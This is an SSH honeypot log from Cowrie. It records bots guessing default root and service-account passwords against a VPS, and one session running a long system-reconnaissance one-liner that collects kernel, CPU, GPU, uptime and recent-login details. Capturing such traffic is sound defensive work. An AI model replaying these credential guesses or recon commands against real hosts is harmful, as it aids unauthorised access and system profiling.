{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:01.425195Z","src_ip":"212.227.125.160","session":"a2ffdc1aab88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56808,"dst_ip":"1.2.3.4","dst_port":22,"session":"654c66e8d5eb","protocol":"ssh","message":"New connection: 212.227.125.160:56808 (1.2.3.4:22) [session: 654c66e8d5eb]","sensor":"my-vps","timestamp":"2025-08-31T04:57:02.628094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:03.034505Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:57:03.035241Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.session.closed","duration":36.22055459022522,"message":"Connection lost after 36 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:04.194847Z","src_ip":"112.167.126.78","session":"6d78fa675f95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46418,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f1d1a8838ba","protocol":"ssh","message":"New connection: 212.227.125.160:46418 (1.2.3.4:22) [session: 9f1d1a8838ba]","sensor":"my-vps","timestamp":"2025-08-31T04:57:04.724413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:04.729442Z","src_ip":"212.227.125.160","session":"9f1d1a8838ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:57:04.912648Z","src_ip":"212.227.125.160","session":"9f1d1a8838ba"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:57:04.969285Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57184,"dst_ip":"1.2.3.4","dst_port":22,"session":"89330c866942","protocol":"ssh","message":"New connection: 212.227.125.160:57184 (1.2.3.4:22) [session: 89330c866942]","sensor":"my-vps","timestamp":"2025-08-31T04:57:05.312675Z"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:05.669171Z","src_ip":"212.227.125.160","session":"9f1d1a8838ba"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":51578,"dst_ip":"1.2.3.4","dst_port":22,"session":"be9ac5c48b95","protocol":"ssh","message":"New connection: 201.148.180.50:51578 (1.2.3.4:22) [session: be9ac5c48b95]","sensor":"my-vps","timestamp":"2025-08-31T04:57:05.688846Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:57:06.242900Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.243593Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.244406Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.245572Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.246686Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.247299Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.247886Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.248599Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.249038Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.249398Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.249762Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.250190Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.250525Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.474005Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.820398Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.821439Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.822968Z","src_ip":"212.227.125.160","session":"654c66e8d5eb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.857324Z","src_ip":"212.227.125.160","session":"9f1d1a8838ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55616,"dst_ip":"1.2.3.4","dst_port":22,"session":"27e56025f436","protocol":"ssh","message":"New connection: 212.227.235.229:55616 (1.2.3.4:22) [session: 27e56025f436]","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.860112Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:57:06.868169Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:57:07.121043Z","src_ip":"212.227.235.229","session":"27e56025f436"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:57:07.206181Z","src_ip":"212.227.235.229","session":"27e56025f436"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:09.039753Z","src_ip":"212.227.125.160","session":"89330c866942"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:57:09.040399Z","src_ip":"212.227.125.160","session":"89330c866942"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:09.505718Z","src_ip":"212.227.235.229","session":"27e56025f436"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60836,"dst_ip":"1.2.3.4","dst_port":22,"session":"07d609ac83a0","protocol":"ssh","message":"New connection: 212.227.125.160:60836 (1.2.3.4:22) [session: 07d609ac83a0]","sensor":"my-vps","timestamp":"2025-08-31T04:57:09.945782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:09.946824Z","src_ip":"212.227.125.160","session":"07d609ac83a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:57:10.133777Z","src_ip":"212.227.125.160","session":"07d609ac83a0"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:10.696464Z","src_ip":"212.227.125.160","session":"07d609ac83a0"}
{"eventid":"cowrie.login.success","username":"root","password":"teste.123","message":"login attempt [root/teste.123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:57:10.762035Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:11.053826Z","src_ip":"212.227.235.229","session":"27e56025f436"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:11.885823Z","src_ip":"212.227.125.160","session":"07d609ac83a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:57:14.017086Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T04:57:14.017800Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:15.355422Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:15.356574Z","src_ip":"201.148.180.50","session":"be9ac5c48b95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60626,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34f52c6b0ee","protocol":"ssh","message":"New connection: 212.227.235.229:60626 (1.2.3.4:22) [session: f34f52c6b0ee]","sensor":"my-vps","timestamp":"2025-08-31T04:57:19.395023Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40544,"dst_ip":"1.2.3.4","dst_port":22,"session":"8265df2c4c04","protocol":"ssh","message":"New connection: 212.227.235.229:40544 (1.2.3.4:22) [session: 8265df2c4c04]","sensor":"my-vps","timestamp":"2025-08-31T04:57:20.431311Z"}
